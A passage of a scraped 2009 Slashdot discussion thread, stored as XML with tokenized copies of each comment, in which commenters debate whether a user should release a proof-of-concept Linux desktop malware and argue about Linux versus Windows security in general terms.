Perhaps take a look at http://insecure.org/ [insecure.org] or http://www.packetstormsecurity.org/ [packetstormsecurity.org].
Both of these sites maintain lists of exploits to various version of Linux and many other types of GNU software as well.
Rootkits most generally fall into the realm of 'malware' and once you've got root, baby, you've got the world.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280960</id>
	<title>Re:Malware and Worms in GNU/Linux and *BSD</title>
	<author>Anonymous</author>
	<datestamp>1259664060000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Good idea, but of course it is possible for a user (and therefore any user-level malware) to edit the users menu - changing or deleting existing entries, or adding new entries. Redirecting an admin program launcher (System-&gt;Administration-&gt;Update Manager is a good one that gets used frequently) to your own malware might be easier. Or just adding Accessories-&gt;Porn Finder would probably do just as well. The better solution to this issue, which I know some people practice, is to ensure that normal users don't have any ability to escalate their own privileges - can't su or sudo. Have a completely separate login for doing admin work - root perhaps?. Some Linux distros do this.</p><p>It's a balance of course. Plenty of new users to Ubuntu bitch about ever having to give passwords at all - "It's MY computer so why is it challenging me?". And they're the sort of idiots who would just log in as root and do everything there all day if they could - no need for the malware they run to have to use tricks to gain system rights at all.</p><p>It has been pointed out elsewhere that any malware you run can read your documents, steal your ID, impersonate you etc. without needing system access anyway. So the real story is that if you run a program that you're not sure what it does - well, you can't be sure what it will do. It might not do what they promised it would do. Hold the front page!</p></htmltext>
<tokenext>Good idea , but of course it is possible for a user ( and therefore any user-level malware ) to edit the users menu - changing or deleting existing entries , or adding new entries .
Redirecting an admin program launcher ( System- &gt; Administration- &gt; Update Manager is a good one that gets used frequently ) to your own malware might be easier .
Or just adding Accessories- &gt; Porn Finder would probably do just as well .
The better solution to this issue , which I know some people practice , is to ensure that normal users do n't have any ability to escalate their own privileges - ca n't su or sudo .
Have a completely separate login for doing admin work - root perhaps ? .
Some Linux distros do this.It 's a balance of course .
Plenty of new users to Ubuntu bitch about ever having to give passwords at all - " It 's MY computer so why is it challenging me ? " .
And they 're the sort of idiots who would just log in as root and do everything there all day if they could - no need for the malware they run to have to use tricks to gain system rights at all.It has been pointed out elsewhere that any malware you run can read your documents , steal your ID , impersonate you etc .
without needing system access anyway .
So the real story is that if you run a program that you 're not sure what it does - well , you ca n't be sure what it will do .
It might not do what they promised it would do .
Hold the front page !</tokentext>
<sentencetext>Good idea, but of course it is possible for a user (and therefore any user-level malware) to edit the users menu - changing or deleting existing entries, or adding new entries.
Redirecting an admin program launcher (System-&gt;Administration-&gt;Update Manager is a good one that gets used frequently) to your own malware might be easier.
Or just adding Accessories-&gt;Porn Finder would probably do just as well.
The better solution to this issue, which I know some people practice, is to ensure that normal users don't have any ability to escalate their own privileges - can't su or sudo.
Have a completely separate login for doing admin work - root perhaps?.
Some Linux distros do this.It's a balance of course.
Plenty of new users to Ubuntu bitch about ever having to give passwords at all - "It's MY computer so why is it challenging me?".
And they're the sort of idiots who would just log in as root and do everything there all day if they could - no need for the malware they run to have to use tricks to gain system rights at all.It has been pointed out elsewhere that any malware you run can read your documents, steal your ID, impersonate you etc.
without needing system access anyway.
So the real story is that if you run a program that you're not sure what it does - well, you can't be sure what it will do.
It might not do what they promised it would do.
Hold the front page!</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278934</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30295150</id>
	<title>Your should get a life</title>
	<author>Anonymous</author>
	<datestamp>1259577660000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>The problem with all weapons, is idiots like you who were bored and had no other avenue of displaying their talents. Give you kudos for comming out and talking about it, but seriously, get a life.</p></htmltext>
<tokenext>The problem with all weapons , is idiots like you who were bored and had no other avenue of displaying their talents .
Give you kudos for comming out and talking about it , but seriously , get a life .</tokentext>
<sentencetext>The problem with all weapons, is idiots like you who were bored and had no other avenue of displaying their talents.
Give you kudos for comming out and talking about it, but seriously, get a life.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30330560</id>
	<title>What's this?</title>
	<author>Anonymous</author>
	<datestamp>1259928960000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Someone just vomited on my monitor??!?</p><p>Oh, no, it's just the Karmic colour scheme!<nobr> <wbr></nobr>;)</p></htmltext>
<tokenext>Someone just vomited on my monitor ? ? !
? Oh , no , it 's just the Karmic colour scheme !
; )</tokentext>
<sentencetext>Someone just vomited on my monitor??!
?Oh, no, it's just the Karmic colour scheme!
;)</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30283386</id>
	<title>Re:Commendable</title>
	<author>fulldecent</author>
	<datestamp>1259683560000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>&gt;&gt; 2) Linux commands on their own can look very cryptic to the uninitiated.. add into that the scripting abilities of most shells.. and a new Linux user won't be able to differentiate a malicious command from one that will get their nvidia driver working again</p><p>you mean like <a href="http://x.phor.net/" title="phor.net">http://x.phor.net/</a> [phor.net]</p></htmltext>
<tokenext>&gt; &gt; 2 ) Linux commands on their own can look very cryptic to the uninitiated.. add into that the scripting abilities of most shells.. and a new Linux user wo n't be able to differentiate a malicious command from one that will get their nvidia driver working againyou mean like http : //x.phor.net/ [ phor.net ]</tokentext>
<sentencetext>&gt;&gt; 2) Linux commands on their own can look very cryptic to the uninitiated.. add into that the scripting abilities of most shells.. and a new Linux user won't be able to differentiate a malicious command from one that will get their nvidia driver working againyou mean like http://x.phor.net/ [phor.net]</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278620</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30282900</id>
	<title>Ummm...</title>
	<author>Marthisdil</author>
	<datestamp>1259681700000</datestamp>
	<modclass>None</modclass>
	<modscore>-1</modscore>
	<htmltext>* I don't want to turn the Linux desktop into Windows, hence I'm slightly leaning towards not releasing it.*

Umm, you won't ever turn the Linux Desktop into Windows because you showed security vulnerabilities.  I'd say release it so the kernel hackers, distro managers, etc, can try and find ways ot keeping similar scripts from working.  It's not like Linux is widespread outside of the server market, anyways.</htmltext>
<tokenext>* I do n't want to turn the Linux desktop into Windows , hence I 'm slightly leaning towards not releasing it .
* Umm , you wo n't ever turn the Linux Desktop into Windows because you showed security vulnerabilities .
I 'd say release it so the kernel hackers , distro managers , etc , can try and find ways ot keeping similar scripts from working .
It 's not like Linux is widespread outside of the server market , anyways .</tokentext>
<sentencetext>* I don't want to turn the Linux desktop into Windows, hence I'm slightly leaning towards not releasing it.
*

Umm, you won't ever turn the Linux Desktop into Windows because you showed security vulnerabilities.
I'd say release it so the kernel hackers, distro managers, etc, can try and find ways ot keeping similar scripts from working.
It's not like Linux is widespread outside of the server market, anyways.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281106</id>
	<title>Probably exploited in the wild already</title>
	<author>What the Frag</author>
	<datestamp>1259665500000</datestamp>
	<modclass>Interestin</modclass>
	<modscore>2</modscore>
	<htmltext><p>My linux systems get a lot of attacks every day. SSH, FTP and HTTP attacks are the most common.</p><p>On HTTP attacks most ones try to get a page<nobr> <wbr></nobr>/phpmyadmin or some other (most of the time php-) application which seem to have severe security issues. There are many insecure web applications out there that are not patched or pretty much broken by design.</p><p>I bet the security hole you're exploiting is already used in the wild. If that's so, who cares if another kid takes your code and turns it into real malware?<br>I personally believe it's more benefit to release your code as "penetration test" and help some admins to check their servers of potential security holes than to do nothing in fear of a few kids.</p></htmltext>
<tokenext>My linux systems get a lot of attacks every day .
SSH , FTP and HTTP attacks are the most common.On HTTP attacks most ones try to get a page /phpmyadmin or some other ( most of the time php- ) application which seem to have severe security issues .
There are many insecure web applications out there that are not patched or pretty much broken by design.I bet the security hole you 're exploiting is already used in the wild .
If that 's so , who cares if another kid takes your code and turns it into real malware ? I personally believe it 's more benefit to release your code as " penetration test " and help some admins to check their servers of potential security holes than to do nothing in fear of a few kids .</tokentext>
<sentencetext>My linux systems get a lot of attacks every day.
SSH, FTP and HTTP attacks are the most common.On HTTP attacks most ones try to get a page /phpmyadmin or some other (most of the time php-) application which seem to have severe security issues.
There are many insecure web applications out there that are not patched or pretty much broken by design.I bet the security hole you're exploiting is already used in the wild.
If that's so, who cares if another kid takes your code and turns it into real malware?I personally believe it's more benefit to release your code as "penetration test" and help some admins to check their servers of potential security holes than to do nothing in fear of a few kids.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279994</id>
	<title>Re:Malware and Worms in GNU/Linux and *BSD</title>
	<author>Anonymous</author>
	<datestamp>1259609460000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>First off, I agree with your argument.</p><p>That being said, the prompt for gksu is "The application '[whatever]' lets you modify essential parts of your system." If the user is paying attention and knows what the command line is, he or she would catch your example attack. A better method would be whatever process TrueCrypt uses to gain root privileges. It takes your root password in a simple dialog box, uses it, then (if I remember the documentation correctly) gives up its root status. However that works (dialog frontend for a simple 'sudo'?) would be a good way to go.</p></htmltext>
<tokenext>First off , I agree with your argument.That being said , the prompt for gksu is " The application ' [ whatever ] ' lets you modify essential parts of your system .
" If the user is paying attention and knows what the command line is , he or she would catch your example attack .
A better method would be whatever process TrueCrypt uses to gain root privileges .
It takes your root password in a simple dialog box , uses it , then ( if I remember the documentation correctly ) gives up its root status .
However that works ( dialog frontend for a simple 'sudo ' ?
) would be a good way to go .</tokentext>
<sentencetext>First off, I agree with your argument.That being said, the prompt for gksu is "The application '[whatever]' lets you modify essential parts of your system.
" If the user is paying attention and knows what the command line is, he or she would catch your example attack.
A better method would be whatever process TrueCrypt uses to gain root privileges.
It takes your root password in a simple dialog box, uses it, then (if I remember the documentation correctly) gives up its root status.
However that works (dialog frontend for a simple 'sudo'?
) would be a good way to go.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278934</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279144</id>
	<title>More Windoes trolls.</title>
	<author>Alex Belits</author>
	<datestamp>1259600580000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>3</modscore>
	<htmltext><p>I have a strong suspicion that this whole "question" is merely an attempt by Windows marketdroids to spread one of their favorite FUD formulas: "Linux is not really secure, it's just too unpopular to be targeted by malware writers". Please note how often it is mentioned in otherwise content-free comments.</p><p>There is no actual "malware". All author claims is that he wrote something that demonstrates the fact that a program executed on a Linux box by a user has that user's access privileges and can do stuff that the user does not expect or like. That's at best a trojan horse -- without capability to gain superuser privileges or compromise other users or hosts, such "malware" is firmly in the range of stupid pranks -- slightly below changing someone's wallpaper to goatse and slightly above asking someone to check out the Last Measure web site. It has nothing to do with millions-strong botnets and hours-to-worldwide-pandemic worms that make Windows such a great platform for crooks and vandals.</p></htmltext>
<tokenext>I have a strong suspicion that this whole " question " is merely an attempt by Windows marketdroids to spread one of their favorite FUD formulas : " Linux is not really secure , it 's just too unpopular to be targeted by malware writers " .
Please note how often it is mentioned in otherwise content-free comments.There is no actual " malware " .
All author claims is that he wrote something that demonstrates the fact that a program executed on a Linux box by a user has that user 's access privileges and can do stuff that the user does not expect or like .
That 's at best a trojan horse -- without capability to gain superuser privileges or compromise other users or hosts , such " malware " is firmly in the range of stupid pranks -- slightly below changing someone 's wallpaper to goatse and slightly above asking someone to check out the Last Measure web site .
It has nothing to do with millions-strong botnets and hours-to-worldwide-pandemic worms that make Windows such a great platform for crooks and vandals .</tokentext>
<sentencetext>I have a strong suspicion that this whole "question" is merely an attempt by Windows marketdroids to spread one of their favorite FUD formulas: "Linux is not really secure, it's just too unpopular to be targeted by malware writers".
Please note how often it is mentioned in otherwise content-free comments.There is no actual "malware".
All author claims is that he wrote something that demonstrates the fact that a program executed on a Linux box by a user has that user's access privileges and can do stuff that the user does not expect or like.
That's at best a trojan horse -- without capability to gain superuser privileges or compromise other users or hosts, such "malware" is firmly in the range of stupid pranks -- slightly below changing someone's wallpaper to goatse and slightly above asking someone to check out the Last Measure web site.
It has nothing to do with millions-strong botnets and hours-to-worldwide-pandemic worms that make Windows such a great platform for crooks and vandals.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30283094</id>
	<title>Re:You've failed to understand the real world</title>
	<author>Anonymous</author>
	<datestamp>1259682540000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>That's because, well, anyone can get <i>root</i> on a slide rule...</p></htmltext>
<tokenext>That 's because , well , anyone can get root on a slide rule.. .</tokentext>
<sentencetext>That's because, well, anyone can get root on a slide rule...</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279060</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30282018</id>
	<title>You are totally awesome!</title>
	<author>Anonymous</author>
	<datestamp>1259675700000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>This is what you REALLY want to hear, right?<br>You wrote some crappy malware (seriously, not that hard to do), managed to autostart it with bashrc (seriously, you call that "nasty"? every first semester student should be able to do it) and then you boast about it on the internet. I very much doubt that the morality of the matter is really a concern. You just want others to know that you are a cool hacker that could hack Linux. Newsflash: Nothing special.<br>Release it or not, it really doesn't matter. There are a million other scripts like that out there already and yours is most probably in no way special.</p></htmltext>
<tokenext>This is what you REALLY want to hear , right ? You wrote some crappy malware ( seriously , not that hard to do ) , managed to autostart it with bashrc ( seriously , you call that " nasty " ?
every first semester student should be able to do it ) and then you boast about it on the internet .
I very much doubt that the morality of the matter is really a concern .
You just want others to know that you are a cool hacker that could hack Linux .
Newsflash : Nothing special.Release it or not , it really does n't matter .
There are a million other scripts like that out there already and yours is most probably in no way special .</tokentext>
<sentencetext>This is what you REALLY want to hear, right?You wrote some crappy malware (seriously, not that hard to do), managed to autostart it with bashrc (seriously, you call that "nasty"?
every first semester student should be able to do it) and then you boast about it on the internet.
I very much doubt that the morality of the matter is really a concern.
You just want others to know that you are a cool hacker that could hack Linux.
Newsflash: Nothing special.Release it or not, it really doesn't matter.
There are a million other scripts like that out there already and yours is most probably in no way special.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30282924</id>
	<title>Yes.</title>
	<author>gbutler69</author>
	<datestamp>1259681880000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Yes, release it! Security through obscurity isn't. This is needed.</htmltext>
<tokenext>Yes , release it !
Security through obscurity is n't .
This is needed .</tokentext>
<sentencetext>Yes, release it!
Security through obscurity isn't.
This is needed.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278728</id>
	<title>Make it easy to reverse  a successful attack</title>
	<author>Anonymous</author>
	<datestamp>1259597040000</datestamp>
	<modclass>Interestin</modclass>
	<modscore>1</modscore>
	<htmltext><p>Perhaps the best action is write and release these tools:<br>Tool A:  It tells the user he has been compromised.<br>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; It also saves copies of the files that may be altered.<br>Tool B:  Copies all the old files and MD5s the raw files<br>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; and the zipped files. (I think that this is hard<br>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; to make both MD5 fake.)<br>Tool C:  Can replace the corrupted files with the save copy.<br>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; It may need a password:<br>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; If the saved copy can be encrypted with some<br>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; password so that it is not easily corruptible.</p><p>The real problem is not getting compromised - but not being<br>able to verify that it has been compromised and<br>being able to restore it.</p><p>Have I missed anything?   -  A careful user.<br>
&nbsp; I love<nobr> <wbr></nobr>./ - read by millions, written by experts</p></htmltext>
<tokenext>Perhaps the best action is write and release these tools : Tool A : It tells the user he has been compromised .
                  It also saves copies of the files that may be altered.Tool B : Copies all the old files and MD5s the raw files                   and the zipped files .
( I think that this is hard                   to make both MD5 fake .
) Tool C : Can replace the corrupted files with the save copy .
                  It may need a password :                   If the saved copy can be encrypted with some                   password so that it is not easily corruptible.The real problem is not getting compromised - but not beingable to verify that it has been compromised andbeing able to restore it.Have I missed anything ?
- A careful user .
  I love ./ - read by millions , written by experts</tokentext>
<sentencetext>Perhaps the best action is write and release these tools:Tool A:  It tells the user he has been compromised.
                  It also saves copies of the files that may be altered.Tool B:  Copies all the old files and MD5s the raw files
                  and the zipped files.
(I think that this is hard
                  to make both MD5 fake.
)Tool C:  Can replace the corrupted files with the save copy.
                  It may need a password:
                  If the saved copy can be encrypted with some
                  password so that it is not easily corruptible.The real problem is not getting compromised - but not beingable to verify that it has been compromised andbeing able to restore it.Have I missed anything?
-  A careful user.
  I love ./ - read by millions, written by experts</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278670</id>
	<title>Ah, No.</title>
	<author>Anonymous</author>
	<datestamp>1259596320000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>I'm glad you're ethical.  The millions of exploits for Windows prove that there are people ready to capitalize on any flaw.  How long do you think it'll take them to make this malicious?  How long do you think it'd take someone smart to engineer the same thing you did with just your explanation here?</p></htmltext>
<tokenext>I 'm glad you 're ethical .
The millions of exploits for Windows prove that there are people ready to capitalize on any flaw .
How long do you think it 'll take them to make this malicious ?
How long do you think it 'd take someone smart to engineer the same thing you did with just your explanation here ?</tokentext>
<sentencetext>I'm glad you're ethical.
The millions of exploits for Windows prove that there are people ready to capitalize on any flaw.
How long do you think it'll take them to make this malicious?
How long do you think it'd take someone smart to engineer the same thing you did with just your explanation here?</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278860</id>
	<title>I'll Help you out...</title>
	<author>Anonymous</author>
	<datestamp>1259597880000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>I'll help you out, just send it in a tarball to me, and I'll verify if it works or not.  Oh, I'm sure you want to keep it opensource and all, so just put the source in there too... I'll make sure your given proper credit.  Thanks.<nobr> <wbr></nobr>:)</p></htmltext>
<tokenext>I 'll help you out , just send it in a tarball to me , and I 'll verify if it works or not .
Oh , I 'm sure you want to keep it opensource and all , so just put the source in there too... I 'll make sure your given proper credit .
Thanks. : )</tokentext>
<sentencetext>I'll help you out, just send it in a tarball to me, and I'll verify if it works or not.
Oh, I'm sure you want to keep it opensource and all, so just put the source in there too... I'll make sure your given proper credit.
Thanks. :)</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279246</id>
	<title>Not new. Not Interesting.</title>
	<author>ponraul</author>
	<datestamp>1259601480000</datestamp>
	<modclass>Flamebait</modclass>
	<modscore>0</modscore>
	<htmltext><p>If Linux malware is unheard of, why does McAfee sell <a href="http://www.mcafee.com/us/enterprise/products/system\_security/servers/linuxshield.html" title="mcafee.com" rel="nofollow">LinuxSheld</a> [mcafee.com]?</p><p>Anyway, people have been releasing internet-wide, UNIX malware <a href="http://en.wikipedia.org/wiki/Morris\_worm" title="wikipedia.org" rel="nofollow">malware</a> [wikipedia.org] for at least 21 years.</p></htmltext>
<tokenext>If Linux malware is unheard of , why does McAfee sell LinuxSheld [ mcafee.com ] ? Anyway , people have been releasing internet-wide , UNIX malware malware [ wikipedia.org ] for at least 21 years .</tokentext>
<sentencetext>If Linux malware is unheard of, why does McAfee sell LinuxSheld [mcafee.com]?Anyway, people have been releasing internet-wide, UNIX malware malware [wikipedia.org] for at least 21 years.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279696</id>
	<title>Re:I think you've already decided...</title>
	<author>Anonymous</author>
	<datestamp>1259605860000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>2</modscore>
	<htmltext><p><div class="quote"><p>OMG! The sky is falling! The sky is falling!</p><p>You can get victimized by something that you HAVE TO CHOOSE TO RUN MANUALLY!</p><p>Nevermind Trojans. A buggy apps could destroy all of my data and it doesn't even need an author with a cheesy villan laugh.</p><p>This doesn't prove anything except that Windows losers desperately want some shadenfruede.</p></div><p>Um, and this is different from a Windows virus how?</p><p>99\% of all infections/trojans/malware/botnets infect/are created by user abuse of the system.</p><p>You can't code against that. The only "protection" that *nix/mac systems have over Windows is that no one gives a rats ass about infecting you, so they don't try. It's not because your system is any more secure against "CLICK HERE TO WIN FREE XBOX 360" infections.</p></div>
	</htmltext>
<tokenext>OMG !
The sky is falling !
The sky is falling ! You can get victimized by something that you HAVE TO CHOOSE TO RUN MANUALLY ! Nevermind Trojans .
A buggy apps could destroy all of my data and it does n't even need an author with a cheesy villan laugh.This does n't prove anything except that Windows losers desperately want some shadenfruede.Um , and this is different from a Windows virus how ? 99 \ % of all infections/trojans/malware/botnets infect/are created by user abuse of the system.You ca n't code against that .
The only " protection " that * nix/mac systems have over Windows is that no one gives a rats ass about infecting you , so they do n't try .
It 's not because your system is any more secure against " CLICK HERE TO WIN FREE XBOX 360 " infections .</tokentext>
<sentencetext>OMG!
The sky is falling!
The sky is falling!You can get victimized by something that you HAVE TO CHOOSE TO RUN MANUALLY!Nevermind Trojans.
A buggy apps could destroy all of my data and it doesn't even need an author with a cheesy villan laugh.This doesn't prove anything except that Windows losers desperately want some shadenfruede.Um, and this is different from a Windows virus how?99\% of all infections/trojans/malware/botnets infect/are created by user abuse of the system.You can't code against that.
The only "protection" that *nix/mac systems have over Windows is that no one gives a rats ass about infecting you, so they don't try.
It's not because your system is any more secure against "CLICK HERE TO WIN FREE XBOX 360" infections.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278820</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279866</id>
	<title>Re:Malware and Worms in GNU/Linux and *BSD</title>
	<author>Blakey Rat</author>
	<datestamp>1259607600000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><i>Looks scary, right? Wrong. Because the solution is as simple as changing the default policy. Make it so that the default behavior is to notify only. On every system update the user should be told: "Go start the updater via the system menu. By the way, if you EVER see an "updater" you didn't start yourself, you are being pwned." Make sure that the system menu is strictly read-only, and even the dimmest user will be safe.</i></p><p><i>This won't be implemented in Windows. Why? I really cannot guess why Microsoft's security policy seems to be designed from ground up to fuck the user, but it is. The usual excuse seems to be: "it's easy to use". But whatever is the reason, you just cannot make a proprietary platform secure because you cannot pop the hood open. With a free OS, you can.</i></p><p>You're forgetting the "human psychology" part of the issue. If you just tell people to update, they won't do it.</p><p>You're also assuming Microsoft is run by morons. Obviously Microsoft's thought of this, but they've decided it's better for more people to have updated OSes then your alternative.</p><p>You're right, though, it's really impossible to prevent an app from simulating the auto-updater-- even the UAC prompt can be faked to look and sound real, if you're willing to spend some time at it. (It would be hard though, and I doubt it would look 100\% right.)</p><p>Your proposal is nice, and you can already set Windows to do that if you want. (In fact, server editions of Windows ship that way by default.) But for the average user, that's a MUCH worse idea than automatically updating the OS.</p><p>But, you know, thanks for "inventing" it.</p></htmltext>
<tokenext>Looks scary , right ?
Wrong. Because the solution is as simple as changing the default policy .
Make it so that the default behavior is to notify only .
On every system update the user should be told : " Go start the updater via the system menu .
By the way , if you EVER see an " updater " you did n't start yourself , you are being pwned .
" Make sure that the system menu is strictly read-only , and even the dimmest user will be safe.This wo n't be implemented in Windows .
Why ? I really can not guess why Microsoft 's security policy seems to be designed from ground up to fuck the user , but it is .
The usual excuse seems to be : " it 's easy to use " .
But whatever is the reason , you just can not make a proprietary platform secure because you can not pop the hood open .
With a free OS , you can.You 're forgetting the " human psychology " part of the issue .
If you just tell people to update , they wo n't do it.You 're also assuming Microsoft is run by morons .
Obviously Microsoft 's thought of this , but they 've decided it 's better for more people to have updated OSes then your alternative.You 're right , though , it 's really impossible to prevent an app from simulating the auto-updater-- even the UAC prompt can be faked to look and sound real , if you 're willing to spend some time at it .
( It would be hard though , and I doubt it would look 100 \ % right .
) Your proposal is nice , and you can already set Windows to do that if you want .
( In fact , server editions of Windows ship that way by default .
) But for the average user , that 's a MUCH worse idea than automatically updating the OS.But , you know , thanks for " inventing " it .</tokentext>
<sentencetext>Looks scary, right?
Wrong. Because the solution is as simple as changing the default policy.
Make it so that the default behavior is to notify only.
On every system update the user should be told: "Go start the updater via the system menu.
By the way, if you EVER see an "updater" you didn't start yourself, you are being pwned.
" Make sure that the system menu is strictly read-only, and even the dimmest user will be safe.This won't be implemented in Windows.
Why? I really cannot guess why Microsoft's security policy seems to be designed from ground up to fuck the user, but it is.
The usual excuse seems to be: "it's easy to use".
But whatever is the reason, you just cannot make a proprietary platform secure because you cannot pop the hood open.
With a free OS, you can.You're forgetting the "human psychology" part of the issue.
If you just tell people to update, they won't do it.You're also assuming Microsoft is run by morons.
Obviously Microsoft's thought of this, but they've decided it's better for more people to have updated OSes then your alternative.You're right, though, it's really impossible to prevent an app from simulating the auto-updater-- even the UAC prompt can be faked to look and sound real, if you're willing to spend some time at it.
(It would be hard though, and I doubt it would look 100\% right.
)Your proposal is nice, and you can already set Windows to do that if you want.
(In fact, server editions of Windows ship that way by default.
) But for the average user, that's a MUCH worse idea than automatically updating the OS.But, you know, thanks for "inventing" it.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278934</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30292100</id>
	<title>Re:Dear Slashdot</title>
	<author>Anonymous</author>
	<datestamp>1259677560000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Personally I use a hockey mask... or am I just being paranoid</p></htmltext>
<tokenext>Personally I use a hockey mask... or am I just being paranoid</tokentext>
<sentencetext>Personally I use a hockey mask... or am I just being paranoid</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278730</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30282172</id>
	<title>Microsoft Shill?</title>
	<author>Anonymous</author>
	<datestamp>1259677440000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>My first thought was that the OP is a Microsoft shill.</p><p>Microsoft would feel very smug if Linux could be shown to be as vulnerable to malware as is Windows.</p><p>Well? Are you?</p></htmltext>
<tokenext>My first thought was that the OP is a Microsoft shill.Microsoft would feel very smug if Linux could be shown to be as vulnerable to malware as is Windows.Well ?
Are you ?</tokentext>
<sentencetext>My first thought was that the OP is a Microsoft shill.Microsoft would feel very smug if Linux could be shown to be as vulnerable to malware as is Windows.Well?
Are you?</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30285768</id>
	<title>Re:Dear Slashdot</title>
	<author>Anonymous</author>
	<datestamp>1259693940000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p><a href="http://www.youtube.com/watch?v=ILvkEHQPHHg" title="youtube.com" rel="nofollow">Specially when eating!</a> [youtube.com] Beware of zombies, though.</p></htmltext>
<tokenext>Specially when eating !
[ youtube.com ] Beware of zombies , though .</tokentext>
<sentencetext>Specially when eating!
[youtube.com] Beware of zombies, though.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278730</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30282104</id>
	<title>Just be careful</title>
	<author>rgviza</author>
	<datestamp>1259676600000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>As long as you release it properly you should do it.</p></htmltext>
<tokenext>As long as you release it properly you should do it .</tokentext>
<sentencetext>As long as you release it properly you should do it.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278780</id>
	<title>Just release it</title>
	<author>Anonymous</author>
	<datestamp>1259597400000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>As you said in your own post, compromising a linux box isn't impossible. The code you have isn't all that revolutionary, it's just a demo. Anybody with actual malicious intent would likely know how to make a program like this themselves.
Another option would be to set up the system on your server but not release the source, you could demonstrate the weaknesses of *nix without putting anybody in any real danger.</htmltext>
<tokenext>As you said in your own post , compromising a linux box is n't impossible .
The code you have is n't all that revolutionary , it 's just a demo .
Anybody with actual malicious intent would likely know how to make a program like this themselves .
